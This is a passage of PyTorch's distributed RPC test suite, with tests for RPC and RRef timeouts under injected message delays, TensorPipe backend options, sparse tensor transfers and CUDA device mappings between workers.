slow_rref.to_here(0.001)
# Note: If we proceed with shutdown, UserRRef will send out a RRefUserDelete
# but this can be a noop since it may not exist on the owner yet. Later,
# the owner can process the RRef creation and wait for the delete message,
# thus leading to a timeout.
# Therefore, we wait until we get notification that pending owners have
# been confirmed before sending out RRefUserDeletes.
if dst_rank != self.rank:
wait_until_owners_and_forks_on_rank(2, 2, rank=dst_rank)
@dist_init(faulty_messages=[], messages_to_delay={"PYTHON_REMOTE_CALL": 2})
def test_udf_remote_message_delay_timeout(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_delay_timeout(func, args)
@dist_init(faulty_messages=[], messages_to_delay={"PYTHON_REMOTE_CALL": 2})
def test_udf_remote_message_delay_timeout_to_self(self):
func = my_sleep_func
args = (1,)
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_builtin_delay_timeout(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_delay_timeout(func, args)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_builtin_delay_timeout_to_self(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_script_delay_timeout(self):
func = my_script_func
args = (torch.tensor(1),)
self._test_remote_message_delay_timeout(func, args)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_script_delay_timeout_to_self(self):
func = my_script_func
args = (torch.tensor(1),)
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_RREF_FETCH_CALL": 1})
def test_rref_to_here_timeout(self):
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
rref = rpc.remote(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref.to_here(0.01)
rref.to_here()
@dist_init(faulty_messages=[])
def test_rpc_builtin_timeout(self):
next_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(next_rank)
expected_error = self.get_timeout_error_regex()
# PYTHON_CALL message types which correspond to Python UDF over RPC
# by default get a delay (see faulty_rpc_agent_test_fixture)
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(
dst_worker,
torch.add,
args=(torch.tensor(1), torch.tensor(1)),
timeout=1,
)
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1)), timeout=1
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure that the currently set default timeout is large enough such
# that RPCs with delays still complete.
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
fut.wait()
# Ensure timeout if we set a new default and don't override
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if we specify timeout of 0
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1)), timeout=0
)
fut.wait()
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_CALL": 1.5})
def test_rpc_script_timeout(self):
next_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(next_rank)
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_script_func, args=(torch.tensor(1),), timeout=1)
fut = rpc.rpc_async(dst_worker, my_script_func, args=(torch.tensor(1),), timeout=1)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure that the currently set default timeout is large enough such
# that RPCs with delays still complete.
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),)
)
fut.wait()
# Ensure timeout if we set a new default and don't override
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),)
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if we specify timeout of 0
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),), timeout=0
)
fut.wait()
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
class TensorPipeAgentRpcTest(RpcAgentTestFixture, RpcTestCommon):
def test_mismatched_type_for_options(self):
# An exception should be raised if the options are not an instance of
# TensorPipeRpcBackendOptions.
rpc_backend_options = FooBackendOptions(self.init_method)
with self.assertRaisesRegex(
TypeError, "`rpc_backend_options` must be a `TensorPipeRpcBackendOptions`"
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=rpc.BackendType.TENSORPIPE,
rpc_backend_options=rpc_backend_options,
)
def test_infer_backend_from_options(self):
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.init_method
)
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
# Do _not_ pass backend.
rpc_backend_options=rpc_backend_options,
)
self.assertIsInstance(rpc.api._get_current_rpc_agent(), rpc.TensorPipeAgent)
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_set_and_get_num_worker_threads(self):
NUM_THREADS = 27
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=NUM_THREADS
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertEqual(int(info["agent.thread_pool_size"]), NUM_THREADS)
rpc.shutdown()
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_tensorpipe_set_default_timeout(self):
# Set a high timeout since it doesn't affect test runtime and ensures
# the test doesn't erroneously timeout due to slow machines.
timeout = 100
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
rpc_timeout=timeout
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
default_timeout = rpc.get_rpc_timeout()
self.assertEqual(default_timeout, timeout)
rpc.shutdown()
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_tensorpipe_options_throw_on_timedelta_timeout(self):
from datetime import timedelta
timeout = timedelta()
# Ensure that constructing TensorPipeRpcBackendOptions with timedelta fails
with self.assertRaisesRegex(TypeError, "incompatible constructor arguments"):
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
rpc_timeout=timeout,
)
@dist_init
def _test_rref_get_type_timeout(self, blocking):
# Test where we try to get the type of a RRef from an owner, but RRef
# creation is slower than timeout passed into _get_type.
dst_rank = (self.rank + 1) % self.world_size
dst = worker_name(dst_rank)
slow_rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), True))
timeout = 0.5
expected_err = self.get_timeout_error_regex()
# Blocking: blocks on inline call
if blocking:
with self.assertRaisesRegex(RuntimeError, expected_err):
slow_rref._get_type(timeout=timeout, blocking=blocking)
# Non-blocking: blocks on wait
else:
fut = slow_rref._get_type(timeout=timeout, blocking=blocking)
with self.assertRaisesRegex(RuntimeError, expected_err):
fut.wait()
# FIXME We wait until the remote completed creating the OwnerRRef
# because there's currently a race if we shut down RPC before that.
slow_rref.to_here()
def test_rref_get_type_timeout_blocking(self):
self._test_rref_get_type_timeout(blocking=True)
def test_rref_get_type_timeout_non_blocking(self):
self._test_rref_get_type_timeout(blocking=False)
@dist_init
def test_op_with_invalid_args(self):
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Overloaded torch operator invoked from Python failed to many any schema"
):
rpc.rpc_sync(dst, torch.add, args=())
def _test_rref_proxy_timeout(self, rref_proxy_api):
dst_rank = (self.rank + 1) % self.world_size
dst = worker_name(dst_rank)
rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), ))
# Ensure RRef is created on remote node.
rref.to_here()
rref_api = getattr(rref, rref_proxy_api)
self.assertTrue(rref_api is not None, f"Failed to get RRef proxy api: {rref_proxy_api}")
expected_error = self.get_timeout_error_regex()
timeout = 2
with self.assertRaisesRegex(RuntimeError, expected_error):
result = rref_api(timeout=timeout).my_slow_method(torch.ones(2, 2))
if rref_api == rref.rpc_async:
result.wait()
elif rref_api == rref.remote:
result._get_future().wait()
# Case where rpc.remote() is stuck and exceeds timeout
slow_rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), True))
timeout = 0.01
rref_api = getattr(slow_rref, rref_proxy_api)
# Note that even when we call rref.rpc_async() in this case, we
# time out in future creation, not waiting for future. This is because
# rref proxy function calls rref._get_type before returning future,
# which blocks on the RRef being created on owner node, until the
# specified timeout.
with self.assertRaisesRegex(RuntimeError, expected_error):
result = rref_api(timeout=timeout).my_instance_method(torch.ones(2, 2))
# rpc_async returns immediately and surface a timeout through wait()
if rref_api == slow_rref.rpc_async:
result.wait()
# FIXME We wait until the remote completed creating the OwnerRRef
# because there's currently a race if we shut down RPC before that.
slow_rref.to_here()
@dist_init
def test_rref_proxy_timeout(self):
for rpc_api in ["rpc_sync", "rpc_async", "remote"]:
self._test_rref_proxy_timeout(rpc_api)
class MyConvNetForMNIST(nn.Module):
def __init__(self, device):
super().__init__()
self.net = nn.Sequential(
nn.Conv2d(1, 16, 3, 1),
nn.ReLU(),
nn.Conv2d(16, 32, 3, 1),
nn.ReLU(),
nn.MaxPool2d(2),
nn.Flatten(1),
nn.Linear(4608, 128),
nn.ReLU(),
nn.Linear(128, 10),
).to(device)
self.device = device
def forward(self, x, is_rref=False):
x = x.to_here() if is_rref else x
with torch.cuda.stream(torch.cuda.current_stream(self.device)):
# intentionally adding delay to current CUDA stream
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
return self.net(x)
def __getstate__(self):
# return an empty dict to avoid inspecting the model contents on the
# owner
return {}
@dist_init
def test_send_to_rank_sparse(self):
dst_rank = (self.rank + 1) % self.world_size
# Test sparse tensor
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
x = build_sparse_tensor()
y = build_sparse_tensor()
expected_tensor = (x + y)
ret = self._run_func_in_mode(dst_rank, torch.add, exec_mode, args=(x, y))
self.assertEqual(expected_tensor, ret)
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
x = build_sparse_tensor(coalesce=True)
y = build_sparse_tensor(coalesce=True)
expected_tensor = (x + y)
ret = self._run_func_in_mode(dst_rank, torch.add, exec_mode, args=(x, y))
self.assertEqual(expected_tensor, ret)
@dist_init
def test_self_py_udf_remote_sparse(self):
self._self_py_udf_remote(
rpc.get_worker_info(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_self_remote_rref_as_rpc_arg_sparse(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._self_remote_rref_as_rpc_arg(
dst,
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_self_remote_rref_as_self_rpc_arg_sparse(self):
self._self_remote_rref_as_rpc_arg(
rpc.get_worker_info(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_self_remote_rref_as_remote_arg_sparse(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._self_remote_rref_as_remote_arg(
dst,
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_self_remote_rref_as_self_remote_arg_sparse(self):
self._self_remote_rref_as_remote_arg(
rpc.get_worker_info(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
def test_world_size_one_sparse(self):
self._world_size_one(
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_multi_rpc_sparse(self):
self._multi_rpc(True)
def test_wait_all_workers_sparse(self):
self._wait_all_workers(heavy_rpc_sparse, build_sparse_tensor())
def test_wait_all_workers_twice_sparse(self):
self._wait_all_workers_twice(heavy_rpc_sparse, build_sparse_tensor())
@dist_init
def test_py_sparse_tensors_in_container(self):
n = self.rank + 1
dst_rank = n % self.world_size
a = [build_sparse_tensor(), build_sparse_tensor()]
ret = rpc.rpc_sync(
worker_name(dst_rank), my_container_sum, args=(a,)
)
self.assertEqual(ret, my_container_sum(a))
@dist_init
def test_nested_rpc_sparse(self):
self._nested_rpc(nested_rpc_sparse, build_sparse_tensor() * 2)
@dist_init
def test_stress_heavy_rpc_sparse(self):
self._stress_test_rpc(heavy_rpc_sparse, repeat=20, args=(build_sparse_tensor(),))
@dist_init
def test_builtin_remote_ret_sparse(self):
self._builtin_remote_ret(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 2
)
@dist_init
def test_builtin_remote_self_sparse(self):
self._builtin_remote_self(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 2
)
@dist_init
def test_multi_builtin_remote_ret_sparse(self):
self._test_multi_remote_call(
torch.add, True,
args_fn=RpcTest._multi_args_fn
)
@dist_init
def test_multi_py_udf_remote_sparse(self):
self._test_multi_remote_call(
my_function,
True,
kwargs_fn=RpcTest._multi_kwargs_fn
)
@dist_init
def test_py_rref_args_sparse(self):
self._py_rref_args(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 4
)
@dist_init
def test_py_rref_args_user_share_sparse(self):
self._py_rref_args_user_share(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 6
)
@dist_init
def test_py_rpc_rref_args_sparse(self):
self._py_rpc_rref_args(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 6
)
@dist_init
def test_nested_remote_sparse(self):
self._nested_remote(
nested_remote_sparse,
build_sparse_tensor() + build_sparse_tensor()
)
@dist_init
def test_nested_rref_sparse(self):
self._nested_rref(
nested_rref_sparse,
build_sparse_tensor() * 2,
build_sparse_tensor() * 2
)
@dist_init
def test_nested_rref_stress_sparse(self):
self._nested_rref_stress(
nested_rref_sparse,
build_sparse_tensor() * 2,
build_sparse_tensor() * 2
)
@dist_init
def test_my_parameter_server_sparse(self):
self._my_parameter_server(True)
class TensorPipeAgentCudaRpcTest(RpcAgentTestFixture, RpcTestCommon):
def _test_device_maps(self, options, errMsg):
with self.assertRaisesRegex(ValueError, errMsg):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
self.assertFalse(rpc.api._is_current_rpc_agent_set())
@skip_if_lt_x_gpu(2)
def test_device_maps_wrong_worker_name(self):
options = self.rpc_backend_options
options.set_device_map("none_exist", {0: 1})
self._test_device_maps(
options,
errMsg="Node worker0 has invalid target node names in its device maps"
)
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_max_local_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {torch.cuda.device_count(): 0})
self._test_device_maps(
options,
errMsg="Node worker0 has source devices with invalid indices in its device map for worker1"
)
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_max_remote_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: torch.cuda.device_count()})
self._test_device_maps(
options,
errMsg="Node worker0 has target devices with invalid indices in its device map for worker1"
)
@skip_if_lt_x_gpu(2)
def test_device_maps_many_to_one(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {1: 0})
options.set_device_map(dst, {0: 0})
self._test_device_maps(
options,
errMsg="Node worker0 has duplicated target devices in its device map for worker1"
)
@skip_if_lt_x_gpu(2)
def test_device_maps_one_to_many(self):
if self.rank == 0:
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: 1})
with self.assertRaisesRegex(
ValueError, "`set_device_map` only supports 1-to-1 mapping"
):
options.set_device_map(dst, {0: 0})
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_min_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Device index must not be negative"
):
options.set_device_map(dst, {-1: 0})
with self.assertRaisesRegex(
RuntimeError, "Device index must not be negative"
):
options.set_device_map(dst, {0: -1})
@staticmethod
def _gpu_add(x, y):
if all([x.is_cuda, x.device.index == 1, y.is_cuda, y.device.index == 1]):
return (x + y).to(0)
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(2)
def test_device_maps_gpu(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: 1, 1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add,
args=(torch.zeros(2).to(0), torch.ones(2).to(0))
)
self.assertEqual(ret.device, torch.device(1))
self.assertEqual(ret, (torch.zeros(2) + torch.ones(2)).to(1))
rpc.shutdown()
@staticmethod
def _gpu_add_given_devices(x, y, x_to, y_to, z_to):
x_device = "cpu" if x.device.type == "cpu" else x.device.index
y_device = "cpu" if y.device.type == "cpu" else y.device.index
if x_device == x_to and y_device == y_to:
return x.to(z_to) + y.to(z_to)
else:
raise ValueError("Wrong device affinity")
def _test_device_maps_gpu(self, x_from, y_from, z_to, device_map, dst=None, fn=None):
fn = TensorPipeAgentCudaRpcTest._gpu_add_given_devices if fn is None else fn
x_to = device_map[x_from]
y_to = device_map[y_from]
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size) if dst is None else dst
options.set_device_map(dst, device_map)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(x_from)
y = torch.ones(2).to(y_from)
ret = rpc.rpc_sync(dst, fn, args=(x, y, x_to, y_to, z_to))
reverse_device_map = {device_map[k] : k for k in device_map}
z_from = reverse_device_map[z_to]
ret_device = "cpu" if ret.device.type == "cpu" else ret.device.index
self.assertEqual(ret_device, z_from)
self.assertEqual(ret, torch.ones(2).to(z_from))
rpc.shutdown()
def test_device_map_cpu(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to="cpu",
device_map={"cpu" : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(1)
def test_device_map_cpu_to_gpu_default(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to=0,
device_map={"cpu" : 0},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_cpu_to_gpu_non_default(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to=1,
device_map={"cpu" : 1},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(1)
def test_device_map_gpu_to_cpu_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to="cpu",
device_map={0 : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_to_cpu_non_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to="cpu",
device_map={1 : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to=0,
device_map={0 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_non_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to=1,
device_map={1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_default_to_non_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to=1,
device_map={0 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_non_default_to_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to=0,
device_map={1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_1(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_2(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_3(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_4(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_5(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_6(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_7(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_8(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_1(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_2(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_3(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_4(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_5(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_6(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_7(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_8(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@staticmethod
def _gpu_add_multi_gpu(x, y):
if all([x.is_cuda, x.device.index == 1, y.is_cuda, y.device.index == 0]):
return x.to(0) + y, x - y.to(1)
else:
raise ValueError("Wrong device affinity")
def _test_device_maps_multi_gpu(self, dst):
options = self.rpc_backend_options
options.set_device_map(dst, {0: 1})
options.set_device_map(dst, {1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(0)
y = torch.ones(2).to(1)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_multi_gpu,
args=(x, y)
)
self.assertEqual(rets[0].device, torch.device(1))
self.assertEqual(rets[1].device, torch.device(0))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(1))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_device_maps_multi_gpu(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_device_maps_multi_gpu(dst)
@skip_if_lt_x_gpu(2)
def test_device_maps_multi_gpu_self(self):
dst = worker_name(self.rank)
self._test_device_maps_multi_gpu(dst)
@staticmethod
def _gpu_add_return_to_gpu(x, y):
if x.device.type == 'cpu' and y.device.type == 'cpu':
return (x + y).to(0), (x - y).to(1), (x * y).to(2), (x / y).to(3)
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(2)
def test_device_maps_in_options(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc.TensorPipeRpcBackendOptions(
init_method=options.init_method,
num_worker_threads=options.num_worker_threads,
device_maps={dst: {0: 1, 1: 0}}
)
)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_multi_gpu,
args=(torch.zeros(2).to(0), torch.ones(2).to(1))
)
self.assertEqual(rets[0].device, torch.device(1))
self.assertEqual(rets[1].device, torch.device(0))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(1))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
rpc.shutdown()
def _test_device_maps_return_to_gpu(self, dst):
options = self.rpc_backend_options
options.set_device_map(dst, {0: 1})
options.set_device_map(dst, {1: 2})
options.set_device_map(dst, {2: 3})
options.set_device_map(dst, {3: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_return_to_gpu,
args=(torch.zeros(2), torch.ones(2))
)
for i in range(len(rets)):
self.assertEqual(rets[i].device, torch.device((3 + i) % 4))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(3))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
self.assertEqual(rets[2], (torch.zeros(2) * torch.ones(2)).to(1))
self.assertEqual(rets[3], (torch.zeros(2) / torch.ones(2)).to(2))
rpc.shutdown()
@skip_if_lt_x_gpu(4)
def test_device_maps_return_to_gpu(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_device_maps_return_to_gpu(dst)
@skip_if_lt_x_gpu(4)
def test_device_maps_return_to_gpu_self(self):
dst = worker_name(self.rank)
self._test_device_maps_return_to_gpu(dst)
@staticmethod
def _add_to_gpu(x, y):
return (x + y).to(0)
def _test_device_maps_missing_config(self, mode):
dst = worker_name((self.rank + 1) % self.world_size)
errMsg = (
"TensorPipe RPC backend only supports CPU tensors by default.*"
"`set_device_map` on `TensorPipeRpcBackendOptions`"
)
with self.assertRaisesRegex(RuntimeError, errMsg):
if mode == RPCExecMode.SYNC:
rpc.rpc_sync(dst, torch.add, args=(torch.zeros(2).to(0), 1))
elif mode == RPCExecMode.REMOTE:
rpc.remote(dst, torch.add, args=(torch.zeros(2).to(0), 1)).to_here()
else:
raise ValueError(f"unexpected mode {mode}")
# make sure RPC is still functioning
ret = rpc.rpc_sync(dst, torch.add, args=(torch.ones(2), 1))
self.assertEqual(ret, torch.ones(2) + 1)
def _test_device_maps_missing_config_response(self, mode):
dst = worker_name((self.rank + 1) % self.world_size)
errMsg = "Response device mapping is not available"
with self.assertRaisesRegex(RuntimeError, errMsg):
if mode == RPCExecMode.SYNC:
rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
)
elif mode == RPCExecMode.REMOTE:
rpc.remote(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
).to_here()
else:
raise ValueError(f"unexpected mode {mode}")
# make sure RPC is still functioning
ret = rpc.rpc_sync(dst, torch.add, args=(torch.ones(2), 1))
self.assertEqual(ret, torch.ones(2) + 1)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config(self):
self._test_device_maps_missing_config(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
